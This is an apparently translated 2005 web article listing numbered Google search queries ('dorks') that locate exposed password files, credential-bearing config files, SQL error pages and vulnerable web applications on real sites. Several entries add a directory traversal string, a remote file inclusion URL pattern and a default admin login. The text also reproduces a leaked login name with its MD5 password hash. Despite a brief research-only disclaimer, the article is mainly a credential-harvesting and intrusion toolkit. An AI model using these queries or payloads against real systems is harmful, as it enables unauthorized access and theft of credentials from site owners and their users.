
Making Use of Google Attack

2005-02-01  Author: compiled by BitsCN  Source: 中国网管联盟

Compiled by: cnbird  Source: http://www.juntuan.net/

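The entries below follow this format: each number is followed by the query to search for in Google, and then by a description and how the vulnerability is exploited. Because my time is limited, I have not translated them; if you are interested, translate them yourselves.
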
1.intitle:Login intext:"RT is ? Copyright"

RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.
Versions including 2.0.13 are vulnerable to injection, check out

SecurityFocus BID 7509

Click here for the Google search ==>intitle:Login intext:"RT is ? Copyright"

2.intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"


The bitboard2 is a board that needs no database to work, so it is useful for webmasters who have no access to a SQL database.
The password file can be retrieved from
/admin/data_passwd.dat

Click here for the Google search ==>intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

3.ext:php program_listing intitle:MythWeb.Program.Listing

MythTV is a homebrew PVR project that I've been working on in my spare time. It's been under heavy development for two years, and is now quite useable and featureful

google==>ext:php program_listing intitle:MythWeb.Program.Listing


4.intitle:index.of abyss.conf


These directories reveal the configuration file of the abyss webserver. These files can contain passwords.

Google ==>intitle:index.of abyss.conf

Here is an excerpt:
MIMEType video/quicktime qt mov
MIMEType video/x-msvideo avi
Version 1.2.1.0
login jagmal
password 5797ae9674912849532661d479f24751
Have a look and take a guess: that's right, this is the MD5 algorithm.


5.inurl:preferences.ini "[emule]" (5 stars)

This finds the emule configuration file which contains some general and proxy information.
Sometimes proxy user and password are stored.

Google==>inurl:preferences.ini "[emule]"


6.ext:ini eudora.ini (4 stars)

Well, this is the configuration file for Eudora... it may contain sensitive information like POP servers, logins and, sometimes, encrypted passwords.

Click here for the Google search ==>ext:ini eudora.ini

7.intitle:"Index of /CFIDE/" administrator

With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.
The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen

Click here for the Google search ==>intitle:"Index of /CFIDE/" administrator

8."# -FrontPage-" inurl:service.pwd (superstar rating)

Frontpage.. very nice clean search results listing !!
No further comments required..

Click here for the Google search ==>"# -FrontPage-" inurl:service.pwd

9.passlist.txt (a better way) (5 stars)


Cleartext passwords. No decryption required!

Click here for the Google search ==>inurl:passlist.txt

10.index.of.password (5 stars)

These directories are named "password." I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things like "horny.htm" or "brittany.htm." These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...)

Click here for the Google search ==>index.of.password


11."access denied for user" "using password" (5 stars)

Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers...

Click here for the Google search ==>"access denied for user" "using password"

12.auth_user_file.txt (4 stars)


DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!)). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

Click here for the Google search ==>allinurl:auth_user_file.txt

13."http://*:*@www" domainname (superstar rating)

This is a query to get inline passwords from search engines (not just Google). You must type in the query followed by the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
"http://bob:bob@www"

Click here for the Google search ==>"http://*:*@www" bob:bob

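(This one is especially dangerous. I hope you will not use it to do anything bad, otherwise it would go against my original intention. I hope everyone cooperates, otherwise there is no need to keep this column open.)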

ORA-00921: unexpected end of SQL command (5 stars)

Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames.

Click here for the Google search ==>"ORA-00921: unexpected end of SQL command"
 
14:ext:php intext:"Powered by phpNewMan Version"

PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more.
PHP News Manager is vulnerable to a directory traversal problem.
path/to/news/browse.php?clang=../../../../../../file/i/want

Click here for the Google search ==>ext:php intext:"Powered by phpNewMan Version"


15:inurl:"/becommunity/community/index.php?pageurl="(E-market remote code execution)

E-market is commercial software made by a Korean company (http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:

http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]
http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]

For more information read this:
http://echo.or.id/adv/adv06-y3dips-2004.txt
Author: y3dips
Date: Sept, 7th 2004
Location: Indonesian, Jakarta

Click here for the Google search ==>inurl:"/becommunity/community/index.php?pageurl="

16.intitle:"ASP FileMan" Resend -site:iisworks.com (5 stars)

FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database.

Default user: user=admin, pass=pass

In the default installation a diagnostics page called diags.asp exists. The manual recommends deleting it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.

Site admins have been notified. As always: DO NOT ABUSE THIS.

Click here for the Google search ==>intitle:"ASP FileMan" Resend -site:iisworks.com

17."BosDates Calendar System " "powered by BosDates v3.2 by BosDev"

"BosDates is a flexible calendar system which allows for multiple calendars, email notifications, repeating events and much more. All of which are easily maintained by even the least technical users."

There is a vulnerability in BosDates that allows an attacker to disclose sensitive information via SQL injection.
Vulnerability description: http://www.zone-h.org/en/advisories/read/id=3925/

Click here for the Google search ==>"BosDates Calendar System " "powered by BosDates v3.2 by BosDev"


18."Enter ip" inurl:"php-ping.php"

It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell metacharacters via the 'count' parameter of php-ping.php script.

Exploitation method: http://www.securityfocus.com/bid/9309/exploit/

Example: http://img64.exs.cx/my.php?loc=img64&image=phpping.jpg


19:ext:conf inurl:rsyncd.conf -cvs -man

rsync is an open source utility that provides fast incremental file transfer.
rsync can also talk to "rsync servers" which can provide anonymous or authenticated rsync.
The configuration files contain data about peers and paths

Click here for the Google search ==>ext:conf inurl:rsyncd.conf -cvs -man

 

This article is for research and study only; please do not use it to cause damage.


